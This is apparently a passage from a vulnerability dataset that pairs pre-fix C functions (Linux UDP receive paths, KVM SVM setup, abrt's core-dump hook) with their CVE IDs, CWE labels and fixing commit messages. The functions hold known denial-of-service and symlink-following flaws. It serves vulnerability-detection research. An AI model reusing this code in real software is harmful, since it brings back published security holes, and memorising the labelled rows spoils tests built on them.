int is_udplite = IS_UDPLITE(sk);
bool slow;
if (flags & MSG_ERRQUEUE)
return ip_recv_error(sk, msg, len, addr_len);
try_again:
skb = __skb_recv_datagram(sk, flags | (noblock ? MSG_DONTWAIT : 0),
&peeked, &off, &err);
if (!skb)
goto out;
ulen = skb->len - sizeof(struct udphdr);
copied = len;
if (copied > ulen)
copied = ulen;
else if (copied < ulen)
msg->msg_flags |= MSG_TRUNC;
/*
* If checksum is needed at all, try to do it while copying the
* data. If the data is truncated, or if we only want a partial
* coverage checksum (UDP-Lite), do it before the copy.
*/
if (copied < ulen || UDP_SKB_CB(skb)->partial_cov) {
if (udp_lib_checksum_complete(skb))
goto csum_copy_err;
}
if (skb_csum_unnecessary(skb))
err = skb_copy_datagram_msg(skb, sizeof(struct udphdr),
msg, copied);
else {
err = skb_copy_and_csum_datagram_msg(skb, sizeof(struct udphdr),
msg);
if (err == -EINVAL)
goto csum_copy_err;
}
if (unlikely(err)) {
trace_kfree_skb(skb, udp_recvmsg);
if (!peeked) {
atomic_inc(&sk->sk_drops);
UDP_INC_STATS_USER(sock_net(sk),
UDP_MIB_INERRORS, is_udplite);
}
goto out_free;
}
if (!peeked)
UDP_INC_STATS_USER(sock_net(sk),
UDP_MIB_INDATAGRAMS, is_udplite);
sock_recv_ts_and_drops(msg, sk, skb);
/* Copy the address. */
if (sin) {
sin->sin_family = AF_INET;
sin->sin_port = udp_hdr(skb)->source;
sin->sin_addr.s_addr = ip_hdr(skb)->saddr;
memset(sin->sin_zero, 0, sizeof(sin->sin_zero));
*addr_len = sizeof(*sin);
}
if (inet->cmsg_flags)
ip_cmsg_recv_offset(msg, skb, sizeof(struct udphdr));
err = copied;
if (flags & MSG_TRUNC)
err = ulen;
out_free:
skb_free_datagram_locked(sk, skb);
out:
return err;
csum_copy_err:
slow = lock_sock_fast(sk);
if (!skb_kill_datagram(sk, skb, flags)) {
UDP_INC_STATS_USER(sock_net(sk), UDP_MIB_CSUMERRORS, is_udplite);
UDP_INC_STATS_USER(sock_net(sk), UDP_MIB_INERRORS, is_udplite);
}
unlock_sock_fast(sk, slow);
if (noblock)
return -EAGAIN;
/* starting over for a new packet */
msg->msg_flags &= ~MSG_TRUNC;
goto try_again;
}
| 200,373,655,058,309,960,000,000,000,000,000,000,000 | udp.c | 207,907,517,686,896,670,000,000,000,000,000,000,000 | [
"CWE-399"
] | CVE-2015-5366 | The (1) udp_recvmsg and (2) udpv6_recvmsg functions in the Linux kernel before 4.0.6 provide inappropriate -EAGAIN return values, which allows remote attackers to cause a denial of service (EPOLLET epoll application read outage) via an incorrect checksum in a UDP packet, a different vulnerability than CVE-2015-5364. | https://nvd.nist.gov/vuln/detail/CVE-2015-5366 |
1,454 | linux | beb39db59d14990e401e235faf66a6b9b31240b0 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/beb39db59d14990e401e235faf66a6b9b31240b0 | udp: fix behavior of wrong checksums
We have two problems in UDP stack related to bogus checksums :
1) We return -EAGAIN to application even if receive queue is not empty.
This breaks applications using edge trigger epoll()
2) Under UDP flood, we can loop forever without yielding to other
processes, potentially hanging the host, especially on non SMP.
This patch is an attempt to make things better.
We might in the future add extra support for rt applications
wanting to better control time spent doing a recv() in a hostile
environment. For example we could validate checksums before queuing
packets in socket receive queue.
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Willem de Bruijn <willemb@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | int udpv6_recvmsg(struct sock *sk, struct msghdr *msg, size_t len,
int noblock, int flags, int *addr_len)
{
struct ipv6_pinfo *np = inet6_sk(sk);
struct inet_sock *inet = inet_sk(sk);
struct sk_buff *skb;
unsigned int ulen, copied;
int peeked, off = 0;
int err;
int is_udplite = IS_UDPLITE(sk);
int is_udp4;
bool slow;
if (flags & MSG_ERRQUEUE)
return ipv6_recv_error(sk, msg, len, addr_len);
if (np->rxpmtu && np->rxopt.bits.rxpmtu)
return ipv6_recv_rxpmtu(sk, msg, len, addr_len);
try_again:
skb = __skb_recv_datagram(sk, flags | (noblock ? MSG_DONTWAIT : 0),
&peeked, &off, &err);
if (!skb)
goto out;
ulen = skb->len - sizeof(struct udphdr);
copied = len;
if (copied > ulen)
copied = ulen;
else if (copied < ulen)
msg->msg_flags |= MSG_TRUNC;
is_udp4 = (skb->protocol == htons(ETH_P_IP));
/*
* If checksum is needed at all, try to do it while copying the
* data. If the data is truncated, or if we only want a partial
* coverage checksum (UDP-Lite), do it before the copy.
*/
if (copied < ulen || UDP_SKB_CB(skb)->partial_cov) {
if (udp_lib_checksum_complete(skb))
goto csum_copy_err;
}
if (skb_csum_unnecessary(skb))
err = skb_copy_datagram_msg(skb, sizeof(struct udphdr),
msg, copied);
else {
err = skb_copy_and_csum_datagram_msg(skb, sizeof(struct udphdr), msg);
if (err == -EINVAL)
goto csum_copy_err;
}
if (unlikely(err)) {
trace_kfree_skb(skb, udpv6_recvmsg);
if (!peeked) {
atomic_inc(&sk->sk_drops);
if (is_udp4)
UDP_INC_STATS_USER(sock_net(sk),
UDP_MIB_INERRORS,
is_udplite);
else
UDP6_INC_STATS_USER(sock_net(sk),
UDP_MIB_INERRORS,
is_udplite);
}
goto out_free;
}
if (!peeked) {
if (is_udp4)
UDP_INC_STATS_USER(sock_net(sk),
UDP_MIB_INDATAGRAMS, is_udplite);
else
UDP6_INC_STATS_USER(sock_net(sk),
UDP_MIB_INDATAGRAMS, is_udplite);
}
sock_recv_ts_and_drops(msg, sk, skb);
/* Copy the address. */
if (msg->msg_name) {
DECLARE_SOCKADDR(struct sockaddr_in6 *, sin6, msg->msg_name);
sin6->sin6_family = AF_INET6;
sin6->sin6_port = udp_hdr(skb)->source;
sin6->sin6_flowinfo = 0;
if (is_udp4) {
ipv6_addr_set_v4mapped(ip_hdr(skb)->saddr,
&sin6->sin6_addr);
sin6->sin6_scope_id = 0;
} else {
sin6->sin6_addr = ipv6_hdr(skb)->saddr;
sin6->sin6_scope_id =
ipv6_iface_scope_id(&sin6->sin6_addr,
inet6_iif(skb));
}
*addr_len = sizeof(*sin6);
}
if (np->rxopt.all)
ip6_datagram_recv_common_ctl(sk, msg, skb);
if (is_udp4) {
if (inet->cmsg_flags)
ip_cmsg_recv(msg, skb);
} else {
if (np->rxopt.all)
ip6_datagram_recv_specific_ctl(sk, msg, skb);
}
err = copied;
if (flags & MSG_TRUNC)
err = ulen;
out_free:
skb_free_datagram_locked(sk, skb);
out:
return err;
csum_copy_err:
slow = lock_sock_fast(sk);
if (!skb_kill_datagram(sk, skb, flags)) {
if (is_udp4) {
UDP_INC_STATS_USER(sock_net(sk),
UDP_MIB_CSUMERRORS, is_udplite);
UDP_INC_STATS_USER(sock_net(sk),
UDP_MIB_INERRORS, is_udplite);
} else {
UDP6_INC_STATS_USER(sock_net(sk),
UDP_MIB_CSUMERRORS, is_udplite);
UDP6_INC_STATS_USER(sock_net(sk),
UDP_MIB_INERRORS, is_udplite);
}
}
unlock_sock_fast(sk, slow);
if (noblock)
return -EAGAIN;
/* starting over for a new packet */
msg->msg_flags &= ~MSG_TRUNC;
goto try_again;
}
| 122,715,536,700,597,060,000,000,000,000,000,000,000 | udp.c | 240,477,898,096,045,670,000,000,000,000,000,000,000 | [
"CWE-399"
] | CVE-2015-5366 | The (1) udp_recvmsg and (2) udpv6_recvmsg functions in the Linux kernel before 4.0.6 provide inappropriate -EAGAIN return values, which allows remote attackers to cause a denial of service (EPOLLET epoll application read outage) via an incorrect checksum in a UDP packet, a different vulnerability than CVE-2015-5364. | https://nvd.nist.gov/vuln/detail/CVE-2015-5366 |
1,455 | linux | 54a20552e1eae07aa240fa370a0293e006b5faed | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/54a20552e1eae07aa240fa370a0293e006b5faed | KVM: x86: work around infinite loop in microcode when #AC is delivered
It was found that a guest can DoS a host by triggering an infinite
stream of "alignment check" (#AC) exceptions. This causes the
microcode to enter an infinite loop where the core never receives
another interrupt. The host kernel panics pretty quickly due to the
effects (CVE-2015-5307).
Signed-off-by: Eric Northup <digitaleric@google.com>
Cc: stable@vger.kernel.org
Signed-off-by: Paolo Bonzini <pbonzini@redhat.com> | 1 | static void init_vmcb(struct vcpu_svm *svm)
{
struct vmcb_control_area *control = &svm->vmcb->control;
struct vmcb_save_area *save = &svm->vmcb->save;
svm->vcpu.fpu_active = 1;
svm->vcpu.arch.hflags = 0;
set_cr_intercept(svm, INTERCEPT_CR0_READ);
set_cr_intercept(svm, INTERCEPT_CR3_READ);
set_cr_intercept(svm, INTERCEPT_CR4_READ);
set_cr_intercept(svm, INTERCEPT_CR0_WRITE);
set_cr_intercept(svm, INTERCEPT_CR3_WRITE);
set_cr_intercept(svm, INTERCEPT_CR4_WRITE);
set_cr_intercept(svm, INTERCEPT_CR8_WRITE);
set_dr_intercepts(svm);
set_exception_intercept(svm, PF_VECTOR);
set_exception_intercept(svm, UD_VECTOR);
set_exception_intercept(svm, MC_VECTOR);
set_intercept(svm, INTERCEPT_INTR);
set_intercept(svm, INTERCEPT_NMI);
set_intercept(svm, INTERCEPT_SMI);
set_intercept(svm, INTERCEPT_SELECTIVE_CR0);
set_intercept(svm, INTERCEPT_RDPMC);
set_intercept(svm, INTERCEPT_CPUID);
set_intercept(svm, INTERCEPT_INVD);
set_intercept(svm, INTERCEPT_HLT);
set_intercept(svm, INTERCEPT_INVLPG);
set_intercept(svm, INTERCEPT_INVLPGA);
set_intercept(svm, INTERCEPT_IOIO_PROT);
set_intercept(svm, INTERCEPT_MSR_PROT);
set_intercept(svm, INTERCEPT_TASK_SWITCH);
set_intercept(svm, INTERCEPT_SHUTDOWN);
set_intercept(svm, INTERCEPT_VMRUN);
set_intercept(svm, INTERCEPT_VMMCALL);
set_intercept(svm, INTERCEPT_VMLOAD);
set_intercept(svm, INTERCEPT_VMSAVE);
set_intercept(svm, INTERCEPT_STGI);
set_intercept(svm, INTERCEPT_CLGI);
set_intercept(svm, INTERCEPT_SKINIT);
set_intercept(svm, INTERCEPT_WBINVD);
set_intercept(svm, INTERCEPT_MONITOR);
set_intercept(svm, INTERCEPT_MWAIT);
set_intercept(svm, INTERCEPT_XSETBV);
control->iopm_base_pa = iopm_base;
control->msrpm_base_pa = __pa(svm->msrpm);
control->int_ctl = V_INTR_MASKING_MASK;
init_seg(&save->es);
init_seg(&save->ss);
init_seg(&save->ds);
init_seg(&save->fs);
init_seg(&save->gs);
save->cs.selector = 0xf000;
save->cs.base = 0xffff0000;
/* Executable/Readable Code Segment */
save->cs.attrib = SVM_SELECTOR_READ_MASK | SVM_SELECTOR_P_MASK |
SVM_SELECTOR_S_MASK | SVM_SELECTOR_CODE_MASK;
save->cs.limit = 0xffff;
save->gdtr.limit = 0xffff;
save->idtr.limit = 0xffff;
init_sys_seg(&save->ldtr, SEG_TYPE_LDT);
init_sys_seg(&save->tr, SEG_TYPE_BUSY_TSS16);
svm_set_efer(&svm->vcpu, 0);
save->dr6 = 0xffff0ff0;
kvm_set_rflags(&svm->vcpu, 2);
save->rip = 0x0000fff0;
svm->vcpu.arch.regs[VCPU_REGS_RIP] = save->rip;
/*
* svm_set_cr0() sets PG and WP and clears NW and CD on save->cr0.
* It also updates the guest-visible cr0 value.
*/
svm_set_cr0(&svm->vcpu, X86_CR0_NW | X86_CR0_CD | X86_CR0_ET);
kvm_mmu_reset_context(&svm->vcpu);
save->cr4 = X86_CR4_PAE;
/* rdx = ?? */
if (npt_enabled) {
/* Setup VMCB for Nested Paging */
control->nested_ctl = 1;
clr_intercept(svm, INTERCEPT_INVLPG);
clr_exception_intercept(svm, PF_VECTOR);
clr_cr_intercept(svm, INTERCEPT_CR3_READ);
clr_cr_intercept(svm, INTERCEPT_CR3_WRITE);
save->g_pat = svm->vcpu.arch.pat;
save->cr3 = 0;
save->cr4 = 0;
}
svm->asid_generation = 0;
svm->nested.vmcb = 0;
svm->vcpu.arch.hflags = 0;
if (boot_cpu_has(X86_FEATURE_PAUSEFILTER)) {
control->pause_filter_count = 3000;
set_intercept(svm, INTERCEPT_PAUSE);
}
mark_all_dirty(svm->vmcb);
enable_gif(svm);
}
| 279,366,401,211,128,940,000,000,000,000,000,000,000 | svm.c | 46,777,106,013,319,800,000,000,000,000,000,000,000 | [
"CWE-399"
] | CVE-2015-5307 | The KVM subsystem in the Linux kernel through 4.2.6, and Xen 4.3.x through 4.6.x, allows guest OS users to cause a denial of service (host OS panic or hang) by triggering many #AC (aka Alignment Check) exceptions, related to svm.c and vmx.c. | https://nvd.nist.gov/vuln/detail/CVE-2015-5307 |
1,461 | abrt | 3c1b60cfa62d39e5fff5a53a5bc53dae189e740e | https://github.com/abrt/abrt | https://github.com/abrt/abrt/commit/3c1b60cfa62d39e5fff5a53a5bc53dae189e740e | ccpp: save abrt core files only to new files
Prior this commit abrt-hook-ccpp saved a core file generated by a
process running a program whose name starts with "abrt" in
DUMP_LOCATION/$(basename program)-coredump. If the file was a symlink,
the hook followed and wrote core file to the symlink's target.
Addresses CVE-2015-5287
Signed-off-by: Jakub Filak <jfilak@redhat.com> | 1 | int main(int argc, char** argv)
{
/* Kernel starts us with all fd's closed.
* But it's dangerous:
* fprintf(stderr) can dump messages into random fds, etc.
* Ensure that if any of fd 0,1,2 is closed, we open it to /dev/null.
*/
int fd = xopen("/dev/null", O_RDWR);
while (fd < 2)
fd = xdup(fd);
if (fd > 2)
close(fd);
int err = 1;
logmode = LOGMODE_JOURNAL;
/* Parse abrt.conf */
load_abrt_conf();
/* ... and plugins/CCpp.conf */
bool setting_MakeCompatCore;
bool setting_SaveBinaryImage;
bool setting_SaveFullCore;
bool setting_CreateCoreBacktrace;
bool setting_SaveContainerizedPackageData;
bool setting_StandaloneHook;
{
map_string_t *settings = new_map_string();
load_abrt_plugin_conf_file("CCpp.conf", settings);
const char *value;
value = get_map_string_item_or_NULL(settings, "MakeCompatCore");
setting_MakeCompatCore = value && string_to_bool(value);
value = get_map_string_item_or_NULL(settings, "SaveBinaryImage");
setting_SaveBinaryImage = value && string_to_bool(value);
value = get_map_string_item_or_NULL(settings, "SaveFullCore");
setting_SaveFullCore = value ? string_to_bool(value) : true;
value = get_map_string_item_or_NULL(settings, "CreateCoreBacktrace");
setting_CreateCoreBacktrace = value ? string_to_bool(value) : true;
value = get_map_string_item_or_NULL(settings, "SaveContainerizedPackageData");
setting_SaveContainerizedPackageData = value && string_to_bool(value);
/* Do not call abrt-action-save-package-data with process's root, if ExploreChroots is disabled. */
if (!g_settings_explorechroots)
{
if (setting_SaveContainerizedPackageData)
log_warning("Ignoring SaveContainerizedPackageData because ExploreChroots is disabled");
setting_SaveContainerizedPackageData = false;
}
value = get_map_string_item_or_NULL(settings, "StandaloneHook");
setting_StandaloneHook = value && string_to_bool(value);
value = get_map_string_item_or_NULL(settings, "VerboseLog");
if (value)
g_verbose = xatoi_positive(value);
free_map_string(settings);
}
if (argc == 2 && strcmp(argv[1], "--config-test"))
return test_configuration(setting_SaveFullCore, setting_CreateCoreBacktrace);
if (argc < 8)
{
/* percent specifier: %s %c %p %u %g %t %e %P %i*/
/* argv: [0] [1] [2] [3] [4] [5] [6] [7] [8] [9]*/
error_msg_and_die("Usage: %s SIGNO CORE_SIZE_LIMIT PID UID GID TIME BINARY_NAME GLOBAL_PID [TID]", argv[0]);
}
/* Not needed on 2.6.30.
* At least 2.6.18 has a bug where
* argv[1] = "SIGNO CORE_SIZE_LIMIT PID ..."
* argv[2] = "CORE_SIZE_LIMIT PID ..."
* and so on. Fixing it:
*/
if (strchr(argv[1], ' '))
{
int i;
for (i = 1; argv[i]; i++)
{
strchrnul(argv[i], ' ')[0] = '\0';
}
}
errno = 0;
const char* signal_str = argv[1];
int signal_no = xatoi_positive(signal_str);
off_t ulimit_c = strtoull(argv[2], NULL, 10);
if (ulimit_c < 0) /* unlimited? */
{
/* set to max possible >0 value */
ulimit_c = ~((off_t)1 << (sizeof(off_t)*8-1));
}
const char *pid_str = argv[3];
pid_t local_pid = xatoi_positive(argv[3]);
uid_t uid = xatoi_positive(argv[4]);
if (errno || local_pid <= 0)
{
perror_msg_and_die("PID '%s' or limit '%s' is bogus", argv[3], argv[2]);
}
{
char *s = xmalloc_fopen_fgetline_fclose(VAR_RUN"/abrt/saved_core_pattern");
/* If we have a saved pattern and it's not a "|PROG ARGS" thing... */
if (s && s[0] != '|')
core_basename = s;
else
free(s);
}
const char *global_pid_str = argv[8];
pid_t pid = xatoi_positive(argv[8]);
pid_t tid = -1;
const char *tid_str = argv[9];
if (tid_str)
{
tid = xatoi_positive(tid_str);
}
char path[PATH_MAX];
char *executable = get_executable(pid);
if (executable && strstr(executable, "/abrt-hook-ccpp"))
{
error_msg_and_die("PID %lu is '%s', not dumping it to avoid recursion",
(long)pid, executable);
}
user_pwd = get_cwd(pid); /* may be NULL on error */
log_notice("user_pwd:'%s'", user_pwd);
sprintf(path, "/proc/%lu/status", (long)pid);
char *proc_pid_status = xmalloc_xopen_read_close(path, /*maxsz:*/ NULL);
uid_t fsuid = uid;
uid_t tmp_fsuid = get_fsuid(proc_pid_status);
if (tmp_fsuid < 0)
perror_msg_and_die("Can't parse 'Uid: line' in /proc/%lu/status", (long)pid);
const int fsgid = get_fsgid(proc_pid_status);
if (fsgid < 0)
error_msg_and_die("Can't parse 'Gid: line' in /proc/%lu/status", (long)pid);
int suid_policy = dump_suid_policy();
if (tmp_fsuid != uid)
{
/* use root for suided apps unless it's explicitly set to UNSAFE */
fsuid = 0;
if (suid_policy == DUMP_SUID_UNSAFE)
fsuid = tmp_fsuid;
else
{
g_user_core_flags = O_EXCL;
g_need_nonrelative = 1;
}
}
/* Open a fd to compat coredump, if requested and is possible */
int user_core_fd = -1;
if (setting_MakeCompatCore && ulimit_c != 0)
/* note: checks "user_pwd == NULL" inside; updates core_basename */
user_core_fd = open_user_core(uid, fsuid, fsgid, pid, &argv[1]);
if (executable == NULL)
{
/* readlink on /proc/$PID/exe failed, don't create abrt dump dir */
error_msg("Can't read /proc/%lu/exe link", (long)pid);
return create_user_core(user_core_fd, pid, ulimit_c);
}
const char *signame = NULL;
if (!signal_is_fatal(signal_no, &signame))
return create_user_core(user_core_fd, pid, ulimit_c); // not a signal we care about
const int abrtd_running = daemon_is_ok();
if (!setting_StandaloneHook && !abrtd_running)
{
/* not an error, exit with exit code 0 */
log("abrtd is not running. If it crashed, "
"/proc/sys/kernel/core_pattern contains a stale value, "
"consider resetting it to 'core'"
);
return create_user_core(user_core_fd, pid, ulimit_c);
}
if (setting_StandaloneHook)
ensure_writable_dir(g_settings_dump_location, DEFAULT_DUMP_LOCATION_MODE, "abrt");
if (g_settings_nMaxCrashReportsSize > 0)
{
/* If free space is less than 1/4 of MaxCrashReportsSize... */
if (low_free_space(g_settings_nMaxCrashReportsSize, g_settings_dump_location))
return create_user_core(user_core_fd, pid, ulimit_c);
}
/* Check /var/tmp/abrt/last-ccpp marker, do not dump repeated crashes
* if they happen too often. Else, write new marker value.
*/
snprintf(path, sizeof(path), "%s/last-ccpp", g_settings_dump_location);
if (check_recent_crash_file(path, executable))
{
/* It is a repeating crash */
return create_user_core(user_core_fd, pid, ulimit_c);
}
const char *last_slash = strrchr(executable, '/');
if (last_slash && strncmp(++last_slash, "abrt", 4) == 0)
{
if (g_settings_debug_level == 0)
{
log_warning("Ignoring crash of %s (SIG%s).",
executable, signame ? signame : signal_str);
goto cleanup_and_exit;
}
/* If abrtd/abrt-foo crashes, we don't want to create a _directory_,
* since that can make new copy of abrtd to process it,
* and maybe crash again...
* Unlike dirs, mere files are ignored by abrtd.
*/
if (snprintf(path, sizeof(path), "%s/%s-coredump", g_settings_dump_location, last_slash) >= sizeof(path))
error_msg_and_die("Error saving '%s': truncated long file path", path);
int abrt_core_fd = xopen3(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
off_t core_size = copyfd_eof(STDIN_FILENO, abrt_core_fd, COPYFD_SPARSE);
if (core_size < 0 || fsync(abrt_core_fd) != 0)
{
unlink(path);
/* copyfd_eof logs the error including errno string,
* but it does not log file name */
error_msg_and_die("Error saving '%s'", path);
}
log_notice("Saved core dump of pid %lu (%s) to %s (%llu bytes)", (long)pid, executable, path, (long long)core_size);
err = 0;
goto cleanup_and_exit;
}
unsigned path_len = snprintf(path, sizeof(path), "%s/ccpp-%s-%lu.new",
g_settings_dump_location, iso_date_string(NULL), (long)pid);
if (path_len >= (sizeof(path) - sizeof("/"FILENAME_COREDUMP)))
{
return create_user_core(user_core_fd, pid, ulimit_c);
}
/* If you don't want to have fs owner as root then:
*
* - use fsuid instead of uid for fs owner, so we don't expose any
* sensitive information of suided app in /var/(tmp|spool)/abrt
*
* - use dd_create_skeleton() and dd_reset_ownership(), when you finish
* creating the new dump directory, to prevent the real owner to write to
* the directory until the hook is done (avoid race conditions and defend
* hard and symbolic link attacs)
*/
dd = dd_create(path, /*fs owner*/0, DEFAULT_DUMP_DIR_MODE);
if (dd)
{
char source_filename[sizeof("/proc/%lu/somewhat_long_name") + sizeof(long)*3];
int source_base_ofs = sprintf(source_filename, "/proc/%lu/root", (long)pid);
source_base_ofs -= strlen("root");
/* What's wrong on using /proc/[pid]/root every time ?*/
/* It creates os_info_in_root_dir for all crashes. */
char *rootdir = process_has_own_root(pid) ? get_rootdir(pid) : NULL;
/* Reading data from an arbitrary root directory is not secure. */
if (g_settings_explorechroots)
{
/* Yes, test 'rootdir' but use 'source_filename' because 'rootdir' can
* be '/' for a process with own namespace. 'source_filename' is /proc/[pid]/root. */
dd_create_basic_files(dd, fsuid, (rootdir != NULL) ? source_filename : NULL);
}
else
{
dd_create_basic_files(dd, fsuid, NULL);
}
char *dest_filename = concat_path_file(dd->dd_dirname, "also_somewhat_longish_name");
char *dest_base = strrchr(dest_filename, '/') + 1;
strcpy(source_filename + source_base_ofs, "maps");
dd_copy_file(dd, FILENAME_MAPS, source_filename);
strcpy(source_filename + source_base_ofs, "limits");
dd_copy_file(dd, FILENAME_LIMITS, source_filename);
strcpy(source_filename + source_base_ofs, "cgroup");
dd_copy_file(dd, FILENAME_CGROUP, source_filename);
strcpy(source_filename + source_base_ofs, "mountinfo");
dd_copy_file(dd, FILENAME_MOUNTINFO, source_filename);
strcpy(dest_base, FILENAME_OPEN_FDS);
strcpy(source_filename + source_base_ofs, "fd");
dump_fd_info_ext(dest_filename, source_filename, dd->dd_uid, dd->dd_gid);
strcpy(dest_base, FILENAME_NAMESPACES);
dump_namespace_diff_ext(dest_filename, 1, pid, dd->dd_uid, dd->dd_gid);
free(dest_filename);
char *tmp = NULL;
get_env_variable(pid, "container", &tmp);
if (tmp != NULL)
{
dd_save_text(dd, FILENAME_CONTAINER, tmp);
free(tmp);
tmp = NULL;
}
get_env_variable(pid, "container_uuid", &tmp);
if (tmp != NULL)
{
dd_save_text(dd, FILENAME_CONTAINER_UUID, tmp);
free(tmp);
}
/* There's no need to compare mount namespaces and search for '/' in
* mountifo. Comparison of inodes of '/proc/[pid]/root' and '/' works
* fine. If those inodes do not equal each other, we have to verify
* that '/proc/[pid]/root' is not a symlink to a chroot.
*/
const int containerized = (rootdir != NULL && strcmp(rootdir, "/") == 0);
if (containerized)
{
log_debug("Process %d is considered to be containerized", pid);
pid_t container_pid;
if (get_pid_of_container(pid, &container_pid) == 0)
{
char *container_cmdline = get_cmdline(container_pid);
dd_save_text(dd, FILENAME_CONTAINER_CMDLINE, container_cmdline);
free(container_cmdline);
}
}
dd_save_text(dd, FILENAME_ANALYZER, "abrt-ccpp");
dd_save_text(dd, FILENAME_TYPE, "CCpp");
dd_save_text(dd, FILENAME_EXECUTABLE, executable);
dd_save_text(dd, FILENAME_PID, pid_str);
dd_save_text(dd, FILENAME_GLOBAL_PID, global_pid_str);
dd_save_text(dd, FILENAME_PROC_PID_STATUS, proc_pid_status);
if (user_pwd)
dd_save_text(dd, FILENAME_PWD, user_pwd);
if (tid_str)
dd_save_text(dd, FILENAME_TID, tid_str);
if (rootdir)
{
if (strcmp(rootdir, "/") != 0)
dd_save_text(dd, FILENAME_ROOTDIR, rootdir);
}
free(rootdir);
char *reason = xasprintf("%s killed by SIG%s",
last_slash, signame ? signame : signal_str);
dd_save_text(dd, FILENAME_REASON, reason);
free(reason);
char *cmdline = get_cmdline(pid);
dd_save_text(dd, FILENAME_CMDLINE, cmdline ? : "");
free(cmdline);
char *environ = get_environ(pid);
dd_save_text(dd, FILENAME_ENVIRON, environ ? : "");
free(environ);
char *fips_enabled = xmalloc_fopen_fgetline_fclose("/proc/sys/crypto/fips_enabled");
if (fips_enabled)
{
if (strcmp(fips_enabled, "0") != 0)
dd_save_text(dd, "fips_enabled", fips_enabled);
free(fips_enabled);
}
dd_save_text(dd, FILENAME_ABRT_VERSION, VERSION);
/* In case of errors, treat the process as if it has locked memory */
long unsigned lck_bytes = ULONG_MAX;
const char *vmlck = strstr(proc_pid_status, "VmLck:");
if (vmlck == NULL)
error_msg("/proc/%s/status does not contain 'VmLck:' line", pid_str);
else if (1 != sscanf(vmlck + 6, "%lu kB\n", &lck_bytes))
error_msg("Failed to parse 'VmLck:' line in /proc/%s/status", pid_str);
if (lck_bytes)
{
log_notice("Process %s of user %lu has locked memory",
pid_str, (long unsigned)uid);
dd_mark_as_notreportable(dd, "The process had locked memory "
"which usually indicates efforts to protect sensitive "
"data (passwords) from being written to disk.\n"
"In order to avoid sensitive information leakages, "
"ABRT will not allow you to report this problem to "
"bug tracking tools");
}
if (setting_SaveBinaryImage)
{
if (save_crashing_binary(pid, dd))
{
error_msg("Error saving '%s'", path);
goto cleanup_and_exit;
}
}
off_t core_size = 0;
if (setting_SaveFullCore)
{
strcpy(path + path_len, "/"FILENAME_COREDUMP);
int abrt_core_fd = create_or_die(path, user_core_fd);
/* We write both coredumps at once.
* We can't write user coredump first, since it might be truncated
* and thus can't be copied and used as abrt coredump;
* and if we write abrt coredump first and then copy it as user one,
* then we have a race when process exits but coredump does not exist yet:
* $ echo -e '#include<signal.h>\nmain(){raise(SIGSEGV);}' | gcc -o test -x c -
* $ rm -f core*; ulimit -c unlimited; ./test; ls -l core*
* 21631 Segmentation fault (core dumped) ./test
* ls: cannot access core*: No such file or directory <=== BAD
*/
core_size = copyfd_sparse(STDIN_FILENO, abrt_core_fd, user_core_fd, ulimit_c);
close_user_core(user_core_fd, core_size);
if (fsync(abrt_core_fd) != 0 || close(abrt_core_fd) != 0 || core_size < 0)
{
unlink(path);
/* copyfd_sparse logs the error including errno string,
* but it does not log file name */
error_msg("Error writing '%s'", path);
goto cleanup_and_exit;
}
}
else
{
/* User core is created even if WriteFullCore is off. */
create_user_core(user_core_fd, pid, ulimit_c);
}
/* User core is either written or closed */
user_core_fd = -1;
/*
* ! No other errors should cause removal of the user core !
*/
/* Because of #1211835 and #1126850 */
#if 0
/* Save JVM crash log if it exists. (JVM's coredump per se
* is nearly useless for JVM developers)
*/
{
char *java_log = xasprintf("/tmp/jvm-%lu/hs_error.log", (long)pid);
int src_fd = open(java_log, O_RDONLY);
free(java_log);
/* If we couldn't open the error log in /tmp directory we can try to
* read the log from the current directory. It may produce AVC, it
* may produce some error log but all these are expected.
*/
if (src_fd < 0)
{
java_log = xasprintf("%s/hs_err_pid%lu.log", user_pwd, (long)pid);
src_fd = open(java_log, O_RDONLY);
free(java_log);
}
if (src_fd >= 0)
{
strcpy(path + path_len, "/hs_err.log");
int dst_fd = create_or_die(path, user_core_fd);
off_t sz = copyfd_eof(src_fd, dst_fd, COPYFD_SPARSE);
if (close(dst_fd) != 0 || sz < 0)
{
error_msg("Error saving '%s'", path);
goto cleanup_and_exit;
}
close(src_fd);
}
}
#endif
/* Perform crash-time unwind of the guilty thread. */
if (tid > 0 && setting_CreateCoreBacktrace)
create_core_backtrace(tid, executable, signal_no, dd);
/* We close dumpdir before we start catering for crash storm case.
* Otherwise, delete_dump_dir's from other concurrent
* CCpp's won't be able to delete our dump (their delete_dump_dir
* will wait for us), and we won't be able to delete their dumps.
* Classic deadlock.
*/
dd_close(dd);
dd = NULL;
path[path_len] = '\0'; /* path now contains only directory name */
if (abrtd_running && setting_SaveContainerizedPackageData && containerized)
{ /* Do we really need to run rpm from core_pattern hook? */
sprintf(source_filename, "/proc/%lu/root", (long)pid);
const char *cmd_args[6];
cmd_args[0] = BIN_DIR"/abrt-action-save-package-data";
cmd_args[1] = "-d";
cmd_args[2] = path;
cmd_args[3] = "-r";
cmd_args[4] = source_filename;
cmd_args[5] = NULL;
pid_t pid = fork_execv_on_steroids(0, (char **)cmd_args, NULL, NULL, path, 0);
int stat;
safe_waitpid(pid, &stat, 0);
}
char *newpath = xstrndup(path, path_len - (sizeof(".new")-1));
if (rename(path, newpath) == 0)
strcpy(path, newpath);
free(newpath);
if (core_size > 0)
log_notice("Saved core dump of pid %lu (%s) to %s (%llu bytes)",
(long)pid, executable, path, (long long)core_size);
if (abrtd_running)
notify_new_path(path);
/* rhbz#539551: "abrt going crazy when crashing process is respawned" */
if (g_settings_nMaxCrashReportsSize > 0)
{
/* x1.25 and round up to 64m: go a bit up, so that usual in-daemon trimming
* kicks in first, and we don't "fight" with it:
*/
unsigned maxsize = g_settings_nMaxCrashReportsSize + g_settings_nMaxCrashReportsSize / 4;
maxsize |= 63;
trim_problem_dirs(g_settings_dump_location, maxsize * (double)(1024*1024), path);
}
err = 0;
}
else
{
/* We didn't create abrt dump, but may need to create compat coredump */
return create_user_core(user_core_fd, pid, ulimit_c);
}
cleanup_and_exit:
if (dd)
dd_delete(dd);
if (user_core_fd >= 0)
unlinkat(dirfd(proc_cwd), core_basename, /*only files*/0);
if (proc_cwd != NULL)
closedir(proc_cwd);
return err;
}
| 287,347,886,890,565,600,000,000,000,000,000,000,000 | None | null | [
"CWE-59"
